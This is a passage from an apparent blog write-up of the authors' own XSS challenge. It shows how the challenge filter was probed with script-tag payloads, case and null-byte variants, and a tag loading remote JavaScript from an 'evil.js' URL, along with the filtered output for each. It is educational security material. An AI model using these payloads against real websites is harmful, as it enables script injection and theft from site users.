As you may already know, we recently held our very first XSS challenge with the prize being a book of choice in information security. This challenge was a bit tricky and if you didn’t focus on the right path you would end up getting no results. We received around 10k requests (around 2MB of data, thanks for not using scanners) from attendees trying to solve our challenge.
The main goal of this challenge was divided into three criteria:
- Reverse engineering of blackbox filters
- Finding a way to bypass attribute RegExp filter
Now we will discuss all three problems…
Part I : Reverse engineering of filters
The first test is obviously script tag itself. I will try by injecting the following payloads:
<script>alert(0);</script> <scrIpt>alert(0);</script> <script src="http://zdresearch.com/evil.js"> <%0ascript SrC="http://zdresearch.com/evil.js"> <scri%00ipt>alert(0);</script>
And I got the following results:
[+] Injected Data : _ [+] Injected Data : _ [+] Injected Data : _ [+] Injected Data : <_script_"_zdresearch_com_evil__"> [+] Injected Data : <scri_ipt>alert_0_;<_script>
Up to know I can easily understand script tag is filtered. On top of that, all src , / , http:// , .js , () words are filtered and replaced by underscore (_).
At this point we have to find a valid tag with attributes, for example we can go for a tag with href: